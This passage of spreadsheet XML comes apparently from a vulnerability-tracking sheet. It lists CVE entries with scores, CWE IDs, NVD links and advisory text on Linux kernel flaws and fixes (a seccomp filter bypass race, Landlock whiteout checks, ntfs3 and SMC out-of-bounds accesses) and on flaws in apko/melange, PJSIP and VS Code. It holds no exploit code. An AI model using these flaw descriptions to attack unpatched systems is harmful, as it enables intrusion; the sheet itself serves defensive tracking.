          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
landlock: Require LANDLOCK_ACCESS_FS_MAKE_REG for whiteout creation
Whiteout objects are used in the upper layer of an OverlayFS to
indicate that the file with this name does not exist in the unified
view, even if it is present in one of the lower layer file systems.
For the userspace implementations of OverlayFS (fuse-overlayfs),
whiteout objects can be created from userspace as well:
* mknod(2) with S_IFCHR and makedev(0, 0)
* renameat2(2) with RENAME_WHITEOUT,
  creating the whiteout in the old place of the moved file.
This commit guards whiteout creation in both of these cases with
LANDLOCK_ACCESS_FS_MAKE_REG.  Whiteout objects are *not* considered
character devices and are not bound to a driver.
LANDLOCK_ACCESS_FS_MAKE_REG describes the same permission class as a
whiteout object: creating one is the only S_IFCHR creation that the VFS
exempts from CAP_MKNOD, so it is as unprivileged as creating a regular
file, while LANDLOCK_ACCESS_FS_MAKE_CHAR and
LANDLOCK_ACCESS_FS_MAKE_BLOCK keep meaning the creation of devices that
expose a kernel interface [1].
For the mknod(2) case, introduce a Landlock erratum.  The creation of
whiteout objects through mknod(2) was previously guarded using
LANDLOCK_ACCESS_FS_MAKE_CHAR, and it is now guarded using
LANDLOCK_ACCESS_FS_MAKE_REG.
For the renameat2(2) case, fix a bug: Before this commit, renameat2(2)
with RENAME_WHITEOUT would create a directory entry even when all
LANDLOCK_ACCESS_FS_MAKE_* rights were denied.
This does not affect normal renames within layered OverlayFS mounts:
When doing a regular rename() on a mounted fuse-overlayfs, it is the
fuse-overlayfs daemon that exercises renameat2() with RENAME_WHITEOUT,
and only the Landlock domain of that daemon is checked there.
Depends-on: 49c9e09d9610 ("landlock: Fix handling of disconnected directories")
Depends-on: fe72ce6710cb ("landlock: Add errata documentation section")
[mic: Record why LANDLOCK_ACCESS_FS_MAKE_REG is the matching right, and
add link(2) to the user doc]</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89560</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89588</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ACPI: APEI: GHES: fix ARM section length accounting after header
In ghes_handle_arm_hw_error(), after skipping the cper_sec_proc_arm
header with (err + 1), the remaining length was reduced by sizeof(err)
(pointer size) instead of sizeof(*err) (structure size).
That overestimates the bytes left for cper_arm_err_info records and can
let the parser read past the CPER section when err_info_num is large
enough relative to error_data_length.
Use sizeof(*err) so the length accounting matches the pointer advance
and the earlier sizeof(*err) size check.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89588</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89599</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fbdev: omapfb: panel-dsi-cm: initialize lock before registering display
dsicm_probe() registers the display before initializing ddata-&gt;lock.
Once omapdss_register_display() publishes the display, another consumer
can reach a dsicm callback that takes this mutex while it is still
uninitialized.
Initialize the mutex before registering the display so the published
callbacks always see a valid lock.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89599</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89603</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
entry: Fix seccomp bypass after ptrace with TSYNC
Sashiko review pointed out the following issue.
If a thread is stopped in syscall_trace_enter() for ptrace, another
thread can install a seccomp filter with SECCOMP_FILTER_FLAG_TSYNC
(e.g., via seccomp_attach_filter()). This will successfully set
SYSCALL_WORK_SECCOMP on the stopped thread, but syscall_trace_enter()
evaluates a cached 'work' variable sampled on entry. Consequently,
the subsequent check for SYSCALL_WORK_SECCOMP misses the newly
assigned flag, and the filter is silently bypassed.
This race condition could allow an unprivileged process to execute
a prohibited system call (e.g., execve) that the newly installed filter
was intended to block, especially since the tracer might have modified
the system call number during the ptrace stop.
Fix this by re-reading the syscall_work flags after ptrace handling,
so that any new SYSCALL_WORK_SECCOMP flag set by another thread via
TSYNC during the ptrace stop is observed before the subsequent
seccomp check.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89603</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89615</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: bound page_lcns[] index by the log record
The copy_lcns loop and the redo shorten loop index page_lcns[] at j + i,
where i runs up to the log record's lcns_follow. That count is checked only
against the record's own length, not the target entry, so check_dp_table()
(which validates the entry's lcns_follow) does not cover it: the copy_lcns
entry may even be freshly allocated after that check, and find_dp() bounds j
but not i. A crafted record thus overflows page_lcns[] of an otherwise valid
entry.
Add dp_range_ok() and reject, before each loop, any record whose run does
not fit the entry. These are the only two page_lcns[] accesses indexed by
the record rather than the entry, so together with the entry validation
every access is now bounded.
[almaz.alexandrovich@paragon-software.com: original patch contained changes to the problem already handled, applied partly]</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89615</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89744</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
device property: fix infinite loop in fwnode_for_each_child_node()
When iterate over children of a fwnode that has a secondary fwnode,
fwnode_get_next_child_node() can enter an infinite loop if the secondary
fwnode has more than one child.
                       Parent        Child
      (Primary fwnode)   FWa:   {FWa1, FWa2, FWa3}
    (Secondary fwnode)   FWb:   {FWb1, FWb2}
In this case:
 ┌─&gt; fwnode_get_next_child_node(FWa, FWa1)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWa1) returns FWa2
 │
 │   ...
 │
 │   fwnode_get_next_child_node(FWa, FWa3)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWa3) returns NULL
 │    - fwnode_call_ptr_op(FWb, get_next_child_node, FWa3) returns FWb1
 │
 │   fwnode_get_next_child_node(FWa, FWb1)
 │    - fwnode_call_ptr_op(FWa, get_next_child_node, FWb1) returns FWa1
 └────┘
This cause fwnode_for_each_child_node() to loop indefinitely, reapeatedly
output {FWa1, FWa2, FWa3, FWb1, FWa1, ...}.
The root cause is that when the current child (FWb1) belongs to the
secondary fwnode, calling get_next_child_node() on the parimary fwnode
incorrectly returns the first child (FWa1) again instead of NULL.
Fix this by dynamically checking the parent fwnode of the current child
before calling get_next_child_node(). This approach follows the pattern
established in commit b5b41ab6b0c1 ("device property: Check
fwnode-&gt;secondary in fwnode_graph_get_next_endpoint()").</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89744</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54174</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-354</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>melange allows users to build apk packages using declarative pipelines. Apko prior to version 1.2.9, corresponding to melange prior to version 0.50.4, verified the control section hash (`.PKGINFO` etc.) against the signed `APKINDEX`, but never verified the data section hash (the actual package files that get installed). An attacker who could compromise a mirror, poison a cache, or MITM a package fetch could substitute arbitrary file contents while the control hash check still passed. Apko version 1.2.9 and melange version 0.50.4 contain a fix.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54174</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80469</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>psirt@sick.de</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>An attacker may achieve arbitrary code execution on a target system by uploading a malicious device driver package, bypassing driver verification mechanisms, and triggering the execution of
attacker-controlled code. User interaction is required.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80469</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81821</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to decrypt and view sensitive information.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81821</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81822</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow a miscreant with read access to PIMBoards project files to reverse engineer PIMBoards users’ app-native passwords through computational brute-forcing of weak hashes, potentially allowing elevation to a PIMBoards administrator user.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81822</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57161</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit acc03b5, a stack buffer overflow exists in PJSUA when processing Service-Route headers in a registration response (update_service_route() in pjsua_acc.c). This affects applications that register using the PJSUA/PJSUA2 account API (the default registration path). The Service-Route URIs from a 2xx response to REGISTER are stored into a fixed-size array without bounding the number of headers; a registrar that returns an excessive number of Service-Route headers can write past the end of the array on the stack. The values written are internal pointers rather than arbitrary data, so the most likely impact is unexpected application termination (denial of service), though memory corruption cannot be excluded. The malicious response may come from a compromised or malicious registrar, or — over unprotected transports — a spoofed response. This issue has been patched via commit acc03b5.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57161</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77097</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained a missing authentication condition affecting metrics upload functionality and service availability. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77097</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79645</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R236"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S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79645</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80985</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: carry oversized SMC-Rv2 LLC messages in the queue entry
smc_llc_rmt_delete_rkey() and smc_llc_save_add_link_rkeys() read the part
of a v2 message that does not fit into the 44-byte union smc_llc_msg, and
both bound themselves by the size of the buffer it landed in, not by what
arrived. On a link with a shared v2 receive buffer a 44-byte
DELETE_RKEY_V2 declaring 255 rkeys reaches rkey[9..254] in whatever an
earlier message left in lgr-&gt;wr_rx_buf_v2, and passes each of them to
smc_rtoken_delete(). One of those 255 matched a registered rtoken and
deleted it. An ADD_LINK on such a link installs up to 255 rtokens from
the same bytes.
Copy the tail into the queue entry, so its length is the length of the
message that arrived, and declare the rkeys that fit inline as a member of
the union instead of reaching them through a cast. The same
DELETE_RKEY_V2 now processes the 9 rkeys it carries. The copy is limited
to the longest tail the two functions can read, so the peer does not pick
the size of the entry.
The bound the previous patch placed on links without a shared v2 receive
buffer is no longer needed.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80985</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81356</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr"/>
      <c r="Q238" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of http requests ('http request/response smuggling') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81356</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
